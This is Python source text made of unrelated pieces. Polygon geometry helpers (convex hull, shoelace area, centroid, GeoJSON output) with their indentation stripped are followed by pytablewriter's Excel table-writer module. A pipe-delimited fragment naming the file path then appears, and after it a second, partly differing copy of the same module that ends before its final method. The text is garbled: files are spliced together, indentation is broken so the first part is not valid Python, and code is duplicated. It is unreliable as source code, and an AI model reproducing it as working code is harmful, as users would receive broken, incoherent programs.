return [ convertGoogleBingToWGS84( p ) for p in planars ]
def compute_graham_scan( planars ):
"""
Attempt to clean the data,
and simplify it to an approximate shape
by returning the list of corners
corresponding to the convex hull of the
given points.
It attempts this using the Graham Scan
"""
return graham_scan.convex_hull( planars )
def compute_area( planars ):
"""
Compute the polygon area, using the Shoelace Formula
We remove the absolute value to allow the signed area to occur.
Tho this will likely never be the case since our points
are ordered in CCW direction.
Taken from here: http://stackoverflow.com/a/24468019
"""
n = len(planars) # of planar coordinates
area = 0.0
for i in range(n):
j = (i + 1) % n
area += planars[i][0] * planars[j][1]
area -= planars[j][0] * planars[i][1]
area = area / 2.0
return area
def compute_centroid( planars ):
"""
Use the centroid formula to compute the centroid
of the polygon defined by these planar co-ordinate pairs.
Taken from here: http://stackoverflow.com/a/14115494
Additional notes:
We make no assumptions as to the cleanness of the points given. So we attempt to clean the data by finding the convex hull of the points using a Graham Scan O ( n log n ), this eliminates points inside the hull.
We then use the centroid formula for a polygon which also requires computing the signed area, to compute the centroid.
This causes a number of approximations. Concave features of the territory are lost, and as much as possible the set of points becomes closer in area to a circle. This is because the convex hull of a set of points the same shape obtained as if you were to stretch a rubber band around all the points and then let it tighten over them. The good point about this approximation is that there is never any point inside the territory which will be outside of our circle. However, there are points inside the circle which are not in the territory. The consequence is we will never fail to retrieve a territory given a point. Tho we will also retrieve territories that do not directly intersect the point but which are neighbours to it. This in itself is useful. And we can rank the territories returned by the distance of their centroid to the point.
This guarantees scalability and fast query speed and straightforward implementation. The cost of this method is accuracy as described above. It seems a reasonable cost, especially considering that retrieving neighbouring territories is also likely useful. A second important cost is that all territories input by providers must be less than the maximum radius. This radius determines the looseness of the groups. The smaller the radius, the tighter the groups, the larger the radius, the looser the groups returned in a query of a given point. The smaller it is, the tighter the groups of results obtained. Yet it is also a trade off, as the larger it is, the larger the territories that can be input. A workable choice can be decided by balancing these two considerations given knowledge of the real world uses, requirements and nature of the territory database.
"""
# compute centroid
area = compute_area(planars)
imax = len(planars) - 1
cx = 0.0
cy = 0.0
for i in range(0,imax):
cx += (planars[i][0] + planars[i+1][0]) * ((planars[i][0] * planars[i+1][1]) - (planars[i+1][0] * planars[i][1]))
cy += (planars[i][1] + planars[i+1][1]) * ((planars[i][0] * planars[i+1][1]) - (planars[i+1][0] * planars[i][1]))
cx += (planars[imax][0] + planars[0][0]) * ((planars[imax][0] * planars[0][1]) - (planars[0][0] * planars[imax][1]))
cy += (planars[imax][1] + planars[0][1]) * ((planars[imax][0] * planars[0][1]) - (planars[0][0] * planars[imax][1]))
cx /= (area * 6.0)
cy /= (area * 6.0)
return [ cx, cy ]
def create_geojson( props_dict, geopt_corners ):
    """
    Serialize territory corners and properties as a GeoJSON Feature string.

    Per RFC 7946: positions are [longitude, latitude] (the original emitted
    [lat, lon]), a Polygon's ``coordinates`` is a list of linear rings, and
    a ring must be closed (first position repeated as the last).

    :param props_dict: arbitrary JSON-serializable properties mapping.
    :param geopt_corners: sequence of GeoPoint-like objects with
        ``latitude`` / ``longitude`` attributes.
    """
    ring = [ [ p.longitude, p.latitude ] for p in geopt_corners ]
    if ring and ring[0] != ring[-1]:
        ring.append(ring[0])  # close the ring as RFC 7946 requires
    return json.dumps( {
        "type" : "Feature",
        "geometry" : {
            "type": "Polygon",
            "coordinates": [ ring ]
        },
        "properties" : props_dict
    } )
import abc
import copy
import warnings
from typing import Any, Dict, Optional, cast # noqa
import dataproperty
import typepy
from dataproperty import DataProperty
from tabledata import TableData
from typepy import Integer
from .._common import import_error_msg_template
from ._excel_workbook import ExcelWorkbookInterface, ExcelWorkbookXls, ExcelWorkbookXlsx
from ._interface import AbstractBinaryTableWriter
class ExcelTableWriter(AbstractBinaryTableWriter, metaclass=abc.ABCMeta):
    """
    An abstract class of a table writer for Excel file format.

    This class owns the workbook/worksheet lifecycle and the sheet layout
    bookkeeping (header rows, data region bounds, current write row);
    format-specific behavior is delegated to subclasses via
    :py:meth:`_open`, :py:meth:`_write_header` and :py:meth:`_write_cell`.
    """
    FORMAT_NAME = "excel"
    @property
    def format_name(self) -> str:
        """str: Writer format name (always ``"excel"``)."""
        return self.FORMAT_NAME
    @property
    def workbook(self) -> Optional[ExcelWorkbookInterface]:
        """The currently opened workbook, or |None| when no workbook is open."""
        return self._workbook
    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)
        self._workbook = None  # type: Optional[ExcelWorkbookInterface]
        # Render non-finite floats as text so Excel can display them.
        self._dp_extractor.type_value_map = {
            typepy.Typecode.INFINITY: "Inf",
            typepy.Typecode.NAN: "NaN",
        }
        # Sheet layout: header occupies row 0, data starts directly below.
        self._first_header_row = 0
        self._last_header_row = self.first_header_row
        self._first_data_row = self.last_header_row + 1
        self._first_data_col = 0
        # Filled in by _postprocess() once a table has been written.
        self._last_data_row = None  # type: Optional[int]
        self._last_data_col = None  # type: Optional[int]
        self._current_data_row = self._first_data_row
        # Quote datetimes so they are written as text, not Excel serials.
        self._quoting_flags = copy.deepcopy(dataproperty.NOT_QUOTING_FLAGS)
        self._quoting_flags[typepy.Typecode.DATETIME] = True
    @property
    def first_header_row(self) -> int:
        """
        :return: Index of the first row of the header.
        :rtype: int
        .. note:: |excel_attr|
        """
        return self._first_header_row
    @property
    def last_header_row(self) -> int:
        """
        :return: Index of the last row of the header.
        :rtype: int
        .. note:: |excel_attr|
        """
        return self._last_header_row
    @property
    def first_data_row(self) -> int:
        """
        :return: Index of the first row of the data (table body).
        :rtype: int
        .. note:: |excel_attr|
        """
        return self._first_data_row
    @property
    def last_data_row(self) -> Optional[int]:
        """
        :return: Index of the last row of the data (table body).
            |None| until a table has been written.
        :rtype: int
        .. note:: |excel_attr|
        """
        return self._last_data_row
    @property
    def first_data_col(self) -> int:
        """
        :return: Index of the first column of the table.
        :rtype: int
        .. note:: |excel_attr|
        """
        return self._first_data_col
    @property
    def last_data_col(self) -> Optional[int]:
        """
        :return: Index of the last column of the table.
            |None| until a table has been written.
        :rtype: int
        .. note:: |excel_attr|
        """
        return self._last_data_col
    def is_opened(self) -> bool:
        """Return |True| if a workbook is currently open."""
        return self.workbook is not None
    def open(self, file_path: str) -> None:
        """
        Open an Excel workbook file.
        :param str file_path: Excel workbook file path to open.

        Re-opening the workbook that is already open is a no-op; opening a
        different path first closes the current workbook.
        """
        if self.is_opened() and self.workbook.file_path == file_path:  # type: ignore
            self._logger.logger.debug("workbook already opened: {}".format(self.workbook.file_path))  # type: ignore
            return
        self.close()
        self._open(file_path)
    @abc.abstractmethod
    def _open(self, workbook_path: str) -> None:  # pragma: no cover
        # Subclass hook: create the format-specific workbook object.
        pass
    def close(self) -> None:
        """
        Close the current workbook.  Safe to call when nothing is open.
        """
        if self.is_opened():
            self.workbook.close()  # type: ignore
            self._workbook = None
    def from_tabledata(self, value: TableData, is_overwrite_table_name: bool = True) -> None:
        """
        Set following attributes from |TableData|
        - :py:attr:`~.table_name`.
        - :py:attr:`~.headers`.
        - :py:attr:`~.value_matrix`.
        And create a worksheet named from :py:attr:`~.table_name`
        if a workbook is currently open.
        :param tabledata.TableData value: Input table data.
        """
        super().from_tabledata(value)
        if self.is_opened():
            self.make_worksheet(self.table_name)
    def make_worksheet(self, sheet_name: Optional[str] = None) -> None:
        """Make a worksheet to the current workbook.
        Args:
            sheet_name (str):
                Name of the worksheet to create. The name will be automatically generated
                (like ``"Sheet1"``) if the ``sheet_name`` is empty.
        """
        if sheet_name is None:
            sheet_name = self.table_name
        if not sheet_name:
            sheet_name = ""
        self._stream = self.workbook.add_worksheet(sheet_name)  # type: ignore
        # Writing restarts at the top of the data region for the new sheet.
        self._current_data_row = self._first_data_row
    def dump(self, output: str, close_after_write: bool = True, **kwargs) -> None:
        """Write a worksheet to the current workbook.
        Args:
            output (str):
                Path to the workbook file to write.
            close_after_write (bool, optional):
                Close the workbook after write.
                Defaults to |True|.
        """
        self.open(output)
        try:
            self.make_worksheet(self.table_name)
            self.write_table(**kwargs)
        finally:
            if close_after_write:
                self.close()
    @abc.abstractmethod
    def _write_header(self) -> None:
        # Subclass hook: write the header row(s) to the worksheet.
        pass
    @abc.abstractmethod
    def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
        # Subclass hook: write a single data cell.
        pass
    def _write_table(self, **kwargs) -> None:
        # Template method: preprocess, write header, body, then record bounds.
        self._preprocess_table_dp()
        self._preprocess_table_property()
        self._write_header()
        self._write_value_matrix()
        self._postprocess()
    def _write_value_matrix(self) -> None:
        # Write the table body row by row, advancing the current data row.
        for value_dp_list in self._table_value_dp_matrix:
            for col_idx, value_dp in enumerate(value_dp_list):
                self._write_cell(self._current_data_row, col_idx, value_dp)
            self._current_data_row += 1
    def _get_last_column(self) -> int:
        """Return the index of the last column, derived from headers or data.

        Raises:
            ValueError: when neither headers nor data rows are available.
        """
        if typepy.is_not_empty_sequence(self.headers):
            return len(self.headers) - 1
        if typepy.is_not_empty_sequence(self.value_matrix):
            return len(self.value_matrix[0]) - 1
        raise ValueError("data not found")
    def _postprocess(self) -> None:
        # Record the bounds of the region just written.
        self._last_data_row = self._current_data_row
        self._last_data_col = self._get_last_column()
class ExcelXlsTableWriter(ExcelTableWriter):
    """
    A table writer class for Excel file format: ``.xls`` (older or equal to Office 2003).
    ``xlwt`` package required to use this class.
    .. py:method:: write_table()
        Write a table to the current opened worksheet.
        :raises IOError: If failed to write data to the worksheet.
    .. note::
        Specific values in the tabular data are converted when writing:
        - |None|: written as an empty string
        - |inf|: written as ``Inf``
        - |nan|: written as ``NaN``
    """
    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)
        # Lazily-built cache of xlwt number-format styles per column index;
        # cleared after each table write.
        self.__col_style_table = {}  # type: Dict[int, Any]
    def _open(self, workbook_path: str) -> None:
        self._workbook = ExcelWorkbookXls(workbook_path)
    def _write_header(self) -> None:
        if not self.is_write_header or typepy.is_empty_sequence(self.headers):
            return
        for col, value in enumerate(self.headers):
            self.stream.write(self.first_header_row, col, value)
    def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
        if value_dp.typecode in [typepy.Typecode.REAL_NUMBER]:
            try:
                cell_style = self.__get_cell_style(col)
            except ValueError:
                # No numeric style applies to this column: fall through to
                # the unstyled write below.
                pass
            else:
                self.stream.write(row, col, value_dp.data, cell_style)
                return
        self.stream.write(row, col, value_dp.data)
    def _postprocess(self) -> None:
        super()._postprocess()
        self.__col_style_table = {}
    def __get_cell_style(self, col: int):
        """Return (and cache) the xlwt number-format style for a column.

        Raises:
            ValueError: when no dedicated numeric style applies to the column.
            ImportError: when the ``xlwt`` package is not installed.
        """
        try:
            import xlwt
        except ImportError:
            warnings.warn(import_error_msg_template.format("excel"))
            raise
        if col in self.__col_style_table:
            return self.__col_style_table.get(col)
        try:
            col_dp = self._column_dp_list[col]
        except IndexError:
            # _column_dp_list is a list, so an out-of-range column raises
            # IndexError. The previous ``except KeyError`` could never fire
            # (letting the IndexError escape past _write_cell's ValueError
            # handler), and its ``return {}`` fallback would have handed a
            # dict to xlwt where an XFStyle is expected. Signal "no style"
            # the way callers expect instead.
            raise ValueError()
        if col_dp.typecode not in [typepy.Typecode.REAL_NUMBER]:
            raise ValueError()
        if not Integer(col_dp.minmax_decimal_places.max_value).is_type():
            raise ValueError()
        float_digit = col_dp.minmax_decimal_places.max_value
        if float_digit <= 0:
            raise ValueError()
        # e.g. float_digit == 2 -> "#,##0.00"
        num_format_str = "#,{:s}0.{:s}".format("#" * int(float_digit), "0" * int(float_digit))
        cell_style = xlwt.easyxf(num_format_str=num_format_str)
        self.__col_style_table[col] = cell_style
        return cell_style
class ExcelXlsxTableWriter(ExcelTableWriter):
    """
    A table writer class for Excel file format: ``.xlsx`` (newer or equal to Office 2007).

    .. py:method:: write_table()

        Write a table to the current opened worksheet.

        :raises IOError: If failed to write data to the worksheet.

        :Examples:
            :ref:`example-excel-table-writer`

        .. note::
            Specific values in the tabular data are converted when writing:

            - |None|: written as an empty string
            - |inf|: written as ``Inf``
            - |nan|: written as ``NaN``
    """

    # Upper bound (in characters) on the auto-computed column width.
    MAX_CELL_WIDTH = 60

    class TableFormat:
        # Keys of ``format_table``: which role a cell format applies to.
        HEADER = "header"
        CELL = "cell"
        NAN = "nan"

    class Default:
        FONT_NAME = "<NAME>"
        FONT_SIZE = 9
        CELL_FORMAT = {
            "font_name": FONT_NAME,
            "font_size": FONT_SIZE,
            "align": "top",
            "text_wrap": True,
            "top": 1,
            "left": 1,
            "bottom": 1,
            "right": 1,
        }
        HEADER_FORMAT = {
            "font_name": FONT_NAME,
            "font_size": FONT_SIZE,
            "bg_color": "#DFDFFF",
            "bold": True,
            "left": 1,
            "right": 1,
        }
        NAN_FORMAT = {
            "font_name": FONT_NAME,
            "font_size": FONT_SIZE,
            "font_color": "silver",
            "top": 1,
            "left": 1,
            "bottom": 1,
            "right": 1,
        }

    @property
    def __nan_format_property(self) -> Dict:
        return self.format_table.get(self.TableFormat.NAN, self.default_format)

    @property
    def __cell_format_property(self) -> Dict:
        return self.format_table.get(self.TableFormat.CELL, self.default_format)

    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)

        self.default_format = self.Default.CELL_FORMAT
        self.format_table = {
            self.TableFormat.CELL: self.Default.CELL_FORMAT,
            self.TableFormat.HEADER: self.Default.HEADER_FORMAT,
            self.TableFormat.NAN: self.Default.NAN_FORMAT,
        }

        # Caches rebuilt for every table written (cleared in _postprocess).
        self.__col_cell_format_cache = {}  # type: Dict[int, Any]
        self.__col_numprops_table = {}  # type: Dict[int, Dict]

    def _open(self, workbook_path: str) -> None:
        self._workbook = ExcelWorkbookXlsx(workbook_path)

    def _write_header(self) -> None:
        if not self.is_write_header or typepy.is_empty_sequence(self.headers):
            return

        header_format_props = self.format_table.get(self.TableFormat.HEADER, self.default_format)
        header_format = self.__add_format(header_format_props)
        self.stream.write_row(
            row=self.first_header_row, col=0, data=self.headers, cell_format=header_format
        )
        # Fill any extra header rows with empty, header-formatted cells
        # (no-op in the default single-header-row layout).
        for row in range(self.first_header_row, self.last_header_row):
            self.stream.write_row(
                row=row, col=0, data=[""] * len(self.headers), cell_format=header_format
            )

    def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
        base_props = dict(self.__cell_format_property)
        format_key = "{:d}_{:s}".format(col, value_dp.typecode.name)

        if value_dp.typecode in [typepy.Typecode.INTEGER, typepy.Typecode.REAL_NUMBER]:
            num_props = self.__get_number_property(col)
            base_props.update(num_props)
            cell_format = self.__get_cell_format(format_key, base_props)
            try:
                self.stream.write_number(row, col, float(value_dp.data), cell_format)
                return
            except TypeError:
                # Not convertible to float after all: fall back to plain write.
                pass

        if value_dp.typecode is typepy.Typecode.NAN:
            base_props = dict(self.__nan_format_property)

        cell_format = self.__get_cell_format(format_key, base_props)
        self.stream.write(row, col, value_dp.data, cell_format)

    def __get_number_property(self, col: int) -> Dict:
        """Return number-format properties for a numeric column (cached)."""
        if col in self.__col_numprops_table:
            return cast(Dict, self.__col_numprops_table.get(col))

        try:
            col_dp = self._column_dp_list[col]
        except IndexError:
            # BUGFIX: _column_dp_list is a sequence, so an out-of-range column
            # raises IndexError (the original caught KeyError, which never
            # fires for list indexing). Fall back to "no number format".
            return {}

        if col_dp.typecode not in [typepy.Typecode.INTEGER, typepy.Typecode.REAL_NUMBER]:
            return {}

        num_props = {}
        if Integer(col_dp.minmax_decimal_places.max_value).is_type():
            float_digit = col_dp.minmax_decimal_places.max_value
            if float_digit > 0:
                num_props = {"num_format": "0.{:s}".format("0" * int(float_digit))}

        self.__col_numprops_table[col] = num_props

        return num_props

    def __get_cell_format(self, format_key, cell_props):
        # NOTE: returns an xlsxwriter Format object; the original "-> Dict"
        # annotation was inaccurate and has been removed.
        cell_format = self.__col_cell_format_cache.get(format_key)
        if cell_format is not None:
            return cell_format

        # cache miss
        cell_format = self.__add_format(cell_props)
        self.__col_cell_format_cache[format_key] = cell_format

        return cell_format

    def __add_format(self, dict_property):
        return self.workbook.workbook.add_format(dict_property)

    def __set_cell_width(self):
        # Scale column widths by font size; skip when font_size is not an int.
        font_size = self.__cell_format_property.get("font_size")

        if not Integer(font_size).is_type():
            return

        for col_idx, col_dp in enumerate(self._column_dp_list):
            width = min(col_dp.ascii_char_width, self.MAX_CELL_WIDTH) * (font_size / 10.0) + 2
            self.stream.set_column(col_idx, col_idx, width=width)

    def _preprocess_table_property(self) -> None:
        super()._preprocess_table_property()
        self.__set_cell_width()

    def _postprocess(self) -> None:
        super()._postprocess()

        # Enable filtering and freeze the header over the written region,
        # then drop the per-table caches.
        self.stream.autofilter(
            self.last_header_row, self.first_data_col, self.last_data_row, self.last_data_col
        )
        self.stream.freeze_panes(self.first_data_row, self.first_data_col)

        self.__col_cell_format_cache = {}
        self.__col_numprops_table = {}
self.__col_numprops_table = {} | pytablewriter/writer/binary/_excel.py | import abc
import copy
import warnings
from typing import Any, Dict, Optional, cast # noqa
import dataproperty
import typepy
from dataproperty import DataProperty
from tabledata import TableData
from typepy import Integer
from .._common import import_error_msg_template
from ._excel_workbook import ExcelWorkbookInterface, ExcelWorkbookXls, ExcelWorkbookXlsx
from ._interface import AbstractBinaryTableWriter
class ExcelTableWriter(AbstractBinaryTableWriter, metaclass=abc.ABCMeta):
    """
    An abstract class of a table writer for Excel file format.

    Concrete subclasses implement the format-specific parts (workbook
    creation, header and cell rendering) for ``.xls`` and ``.xlsx``.
    """

    FORMAT_NAME = "excel"

    @property
    def format_name(self) -> str:
        return self.FORMAT_NAME

    @property
    def workbook(self) -> Optional[ExcelWorkbookInterface]:
        # Currently opened workbook, or None when no workbook is open.
        return self._workbook

    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)

        self._workbook = None  # type: Optional[ExcelWorkbookInterface]

        # Render non-finite numbers as readable text in cells.
        self._dp_extractor.type_value_map = {
            typepy.Typecode.INFINITY: "Inf",
            typepy.Typecode.NAN: "NaN",
        }

        # Layout: a single header row directly followed by the data body.
        self._first_header_row = 0
        self._last_header_row = self.first_header_row
        self._first_data_row = self.last_header_row + 1
        self._first_data_col = 0
        # Extents of the written data; set by _postprocess().
        self._last_data_row = None  # type: Optional[int]
        self._last_data_col = None  # type: Optional[int]

        # Cursor for the next data row to write; advanced per record.
        self._current_data_row = self._first_data_row

        # Quote datetimes so Excel does not reinterpret them.
        self._quoting_flags = copy.deepcopy(dataproperty.NOT_QUOTING_FLAGS)
        self._quoting_flags[typepy.Typecode.DATETIME] = True

    @property
    def first_header_row(self) -> int:
        """
        :return: Index of the first row of the header.
        :rtype: int

        .. note:: |excel_attr|
        """
        return self._first_header_row

    @property
    def last_header_row(self) -> int:
        """
        :return: Index of the last row of the header.
        :rtype: int

        .. note:: |excel_attr|
        """
        return self._last_header_row

    @property
    def first_data_row(self) -> int:
        """
        :return: Index of the first row of the data (table body).
        :rtype: int

        .. note:: |excel_attr|
        """
        return self._first_data_row

    @property
    def last_data_row(self) -> Optional[int]:
        """
        :return: Index of the last row of the data (table body).
        :rtype: int

        .. note:: |excel_attr|
        """
        return self._last_data_row

    @property
    def first_data_col(self) -> int:
        """
        :return: Index of the first column of the table.
        :rtype: int

        .. note:: |excel_attr|
        """
        return self._first_data_col

    @property
    def last_data_col(self) -> Optional[int]:
        """
        :return: Index of the last column of the table.
        :rtype: int

        .. note:: |excel_attr|
        """
        return self._last_data_col

    def is_opened(self) -> bool:
        return self.workbook is not None

    def open(self, file_path: str) -> None:
        """
        Open an Excel workbook file.

        :param str file_path: Excel workbook file path to open.
        """
        # Re-opening the same path is a no-op, so previously added
        # worksheets are kept.
        if self.is_opened() and self.workbook.file_path == file_path:  # type: ignore
            self._logger.logger.debug("workbook already opened: {}".format(self.workbook.file_path))  # type: ignore
            return

        self.close()
        self._open(file_path)

    @abc.abstractmethod
    def _open(self, workbook_path: str) -> None:  # pragma: no cover
        pass

    def close(self) -> None:
        """
        Close the current workbook.
        """
        if self.is_opened():
            self.workbook.close()  # type: ignore
            self._workbook = None

    def from_tabledata(self, value: TableData, is_overwrite_table_name: bool = True) -> None:
        """
        Set following attributes from |TableData|

        - :py:attr:`~.table_name`.
        - :py:attr:`~.headers`.
        - :py:attr:`~.value_matrix`.

        And create a worksheet named from :py:attr:`~.table_name`
        if not existed yet.

        :param tabledata.TableData value: Input table data.
        """
        super().from_tabledata(value)

        if self.is_opened():
            self.make_worksheet(self.table_name)

    def make_worksheet(self, sheet_name: Optional[str] = None) -> None:
        """Make a worksheet to the current workbook.

        Args:
            sheet_name (str):
                Name of the worksheet to create. The name will be automatically generated
                (like ``"Sheet1"``) if the ``sheet_name`` is empty.
        """
        if sheet_name is None:
            sheet_name = self.table_name
        if not sheet_name:
            sheet_name = ""

        self._stream = self.workbook.add_worksheet(sheet_name)  # type: ignore
        # Reset the write cursor for the fresh worksheet.
        self._current_data_row = self._first_data_row

    def dump(self, output: str, close_after_write: bool = True, **kwargs) -> None:
        """Write a worksheet to the current workbook.

        Args:
            output (str):
                Path to the workbook file to write.
            close_after_write (bool, optional):
                Close the workbook after write.
                Defaults to |True|.
        """
        self.open(output)
        try:
            self.make_worksheet(self.table_name)
            self.write_table(**kwargs)
        finally:
            # Close even if writing raised — unless the caller wants to keep
            # the workbook open to append more worksheets.
            if close_after_write:
                self.close()

    @abc.abstractmethod
    def _write_header(self) -> None:
        # Subclasses emit the header row(s) for their specific Excel format.
        pass

    @abc.abstractmethod
    def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
        # Subclasses write one cell value with format-specific styling.
        pass

    def _write_table(self, **kwargs) -> None:
        # Template method: preprocessing must run before any cell is written,
        # and _postprocess() records the final row/column extents afterwards.
        self._preprocess_table_dp()
        self._preprocess_table_property()
        self._write_header()
        self._write_value_matrix()
        self._postprocess()

    def _write_value_matrix(self) -> None:
        # One worksheet row per record; the cursor advances after each record.
        for value_dp_list in self._table_value_dp_matrix:
            for col_idx, value_dp in enumerate(value_dp_list):
                self._write_cell(self._current_data_row, col_idx, value_dp)
            self._current_data_row += 1

    def _get_last_column(self) -> int:
        # Header width takes precedence; fall back to the first data row.
        if typepy.is_not_empty_sequence(self.headers):
            return len(self.headers) - 1

        if typepy.is_not_empty_sequence(self.value_matrix):
            return len(self.value_matrix[0]) - 1

        raise ValueError("data not found")

    def _postprocess(self) -> None:
        # Record the extent of the written data for the last_data_* properties.
        self._last_data_row = self._current_data_row
        self._last_data_col = self._get_last_column()
class ExcelXlsTableWriter(ExcelTableWriter):
    """
    A table writer class for Excel file format: ``.xls`` (older or equal to Office 2003).
    ``xlwt`` package required to use this class.

    .. py:method:: write_table()

        Write a table to the current opened worksheet.

        :raises IOError: If failed to write data to the worksheet.

        .. note::
            Specific values in the tabular data are converted when writing:

            - |None|: written as an empty string
            - |inf|: written as ``Inf``
            - |nan|: written as ``NaN``
    """

    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)

        # Per-column cache of xlwt styles; rebuilt for every table written.
        self.__col_style_table = {}  # type: Dict[int, Any]

    def _open(self, workbook_path: str) -> None:
        self._workbook = ExcelWorkbookXls(workbook_path)

    def _write_header(self) -> None:
        if not self.is_write_header or typepy.is_empty_sequence(self.headers):
            return

        for col, value in enumerate(self.headers):
            self.stream.write(self.first_header_row, col, value)

    def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
        if value_dp.typecode in [typepy.Typecode.REAL_NUMBER]:
            try:
                cell_style = self.__get_cell_style(col)
            except ValueError:
                # No numeric style applies to this column: fall through to
                # the plain (unstyled) write below.
                pass
            else:
                self.stream.write(row, col, value_dp.data, cell_style)
                return

        self.stream.write(row, col, value_dp.data)

    def _postprocess(self) -> None:
        super()._postprocess()

        # Styles are derived from the current table's column properties, so
        # drop the cache before the next table is written.
        self.__col_style_table = {}

    def __get_cell_style(self, col: int):
        """Return a cached ``xlwt`` style for a real-number column.

        Raises:
            ValueError: If no numeric style applies to the column
                (the caller then writes the cell without a style).
            ImportError: If ``xlwt`` is not installed.
        """
        try:
            import xlwt
        except ImportError:
            warnings.warn(import_error_msg_template.format("excel"))
            raise

        if col in self.__col_style_table:
            return self.__col_style_table.get(col)

        try:
            col_dp = self._column_dp_list[col]
        except (IndexError, KeyError):
            # BUGFIX: _column_dp_list is a sequence, so an out-of-range column
            # raises IndexError; the original caught only KeyError (which
            # never fires here) and its dead branch returned a plain dict
            # where callers expect an xlwt style. Treat a missing column as
            # "no style available" so the caller writes the cell unstyled.
            raise ValueError() from None

        if col_dp.typecode not in [typepy.Typecode.REAL_NUMBER]:
            raise ValueError()

        if not Integer(col_dp.minmax_decimal_places.max_value).is_type():
            raise ValueError()

        float_digit = col_dp.minmax_decimal_places.max_value
        if float_digit <= 0:
            raise ValueError()

        num_format_str = "#,{:s}0.{:s}".format("#" * int(float_digit), "0" * int(float_digit))
        cell_style = xlwt.easyxf(num_format_str=num_format_str)
        self.__col_style_table[col] = cell_style

        return cell_style
class ExcelXlsxTableWriter(ExcelTableWriter):
    """
    A table writer class for Excel file format: ``.xlsx`` (newer or equal to Office 2007).

    .. py:method:: write_table()

        Write a table to the current opened worksheet.

        :raises IOError: If failed to write data to the worksheet.

        :Examples:
            :ref:`example-excel-table-writer`

        .. note::
            Specific values in the tabular data are converted when writing:

            - |None|: written as an empty string
            - |inf|: written as ``Inf``
            - |nan|: written as ``NaN``
    """

    # Upper bound (in characters) on the auto-computed column width.
    MAX_CELL_WIDTH = 60

    class TableFormat:
        # Keys of ``format_table``: which role a cell format applies to.
        HEADER = "header"
        CELL = "cell"
        NAN = "nan"

    class Default:
        FONT_NAME = "<NAME>"
        FONT_SIZE = 9
        CELL_FORMAT = {
            "font_name": FONT_NAME,
            "font_size": FONT_SIZE,
            "align": "top",
            "text_wrap": True,
            "top": 1,
            "left": 1,
            "bottom": 1,
            "right": 1,
        }
        HEADER_FORMAT = {
            "font_name": FONT_NAME,
            "font_size": FONT_SIZE,
            "bg_color": "#DFDFFF",
            "bold": True,
            "left": 1,
            "right": 1,
        }
        NAN_FORMAT = {
            "font_name": FONT_NAME,
            "font_size": FONT_SIZE,
            "font_color": "silver",
            "top": 1,
            "left": 1,
            "bottom": 1,
            "right": 1,
        }

    @property
    def __nan_format_property(self) -> Dict:
        return self.format_table.get(self.TableFormat.NAN, self.default_format)

    @property
    def __cell_format_property(self) -> Dict:
        return self.format_table.get(self.TableFormat.CELL, self.default_format)

    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)

        self.default_format = self.Default.CELL_FORMAT
        self.format_table = {
            self.TableFormat.CELL: self.Default.CELL_FORMAT,
            self.TableFormat.HEADER: self.Default.HEADER_FORMAT,
            self.TableFormat.NAN: self.Default.NAN_FORMAT,
        }

        # Caches rebuilt for every table written (cleared in _postprocess).
        self.__col_cell_format_cache = {}  # type: Dict[int, Any]
        self.__col_numprops_table = {}  # type: Dict[int, Dict]

    def _open(self, workbook_path: str) -> None:
        self._workbook = ExcelWorkbookXlsx(workbook_path)

    def _write_header(self) -> None:
        if not self.is_write_header or typepy.is_empty_sequence(self.headers):
            return

        header_format_props = self.format_table.get(self.TableFormat.HEADER, self.default_format)
        header_format = self.__add_format(header_format_props)
        self.stream.write_row(
            row=self.first_header_row, col=0, data=self.headers, cell_format=header_format
        )
        # Fill any extra header rows with empty, header-formatted cells
        # (no-op in the default single-header-row layout).
        for row in range(self.first_header_row, self.last_header_row):
            self.stream.write_row(
                row=row, col=0, data=[""] * len(self.headers), cell_format=header_format
            )

    def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
        base_props = dict(self.__cell_format_property)
        format_key = "{:d}_{:s}".format(col, value_dp.typecode.name)

        if value_dp.typecode in [typepy.Typecode.INTEGER, typepy.Typecode.REAL_NUMBER]:
            num_props = self.__get_number_property(col)
            base_props.update(num_props)
            cell_format = self.__get_cell_format(format_key, base_props)
            try:
                self.stream.write_number(row, col, float(value_dp.data), cell_format)
                return
            except TypeError:
                # Not convertible to float after all: fall back to plain write.
                pass

        if value_dp.typecode is typepy.Typecode.NAN:
            base_props = dict(self.__nan_format_property)

        cell_format = self.__get_cell_format(format_key, base_props)
        self.stream.write(row, col, value_dp.data, cell_format)

    def __get_number_property(self, col: int) -> Dict:
        """Return number-format properties for a numeric column (cached)."""
        if col in self.__col_numprops_table:
            return cast(Dict, self.__col_numprops_table.get(col))

        try:
            col_dp = self._column_dp_list[col]
        except IndexError:
            # BUGFIX: _column_dp_list is a sequence, so an out-of-range column
            # raises IndexError (the original caught KeyError, which never
            # fires for list indexing). Fall back to "no number format".
            return {}

        if col_dp.typecode not in [typepy.Typecode.INTEGER, typepy.Typecode.REAL_NUMBER]:
            return {}

        num_props = {}
        if Integer(col_dp.minmax_decimal_places.max_value).is_type():
            float_digit = col_dp.minmax_decimal_places.max_value
            if float_digit > 0:
                num_props = {"num_format": "0.{:s}".format("0" * int(float_digit))}

        self.__col_numprops_table[col] = num_props

        return num_props

    def __get_cell_format(self, format_key, cell_props):
        # NOTE: returns an xlsxwriter Format object; the original "-> Dict"
        # annotation was inaccurate and has been removed.
        cell_format = self.__col_cell_format_cache.get(format_key)
        if cell_format is not None:
            return cell_format

        # cache miss
        cell_format = self.__add_format(cell_props)
        self.__col_cell_format_cache[format_key] = cell_format

        return cell_format

    def __add_format(self, dict_property):
        return self.workbook.workbook.add_format(dict_property)

    def __set_cell_width(self):
        # Scale column widths by font size; skip when font_size is not an int.
        font_size = self.__cell_format_property.get("font_size")

        if not Integer(font_size).is_type():
            return

        for col_idx, col_dp in enumerate(self._column_dp_list):
            width = min(col_dp.ascii_char_width, self.MAX_CELL_WIDTH) * (font_size / 10.0) + 2
            self.stream.set_column(col_idx, col_idx, width=width)

    def _preprocess_table_property(self) -> None:
        super()._preprocess_table_property()
        self.__set_cell_width()

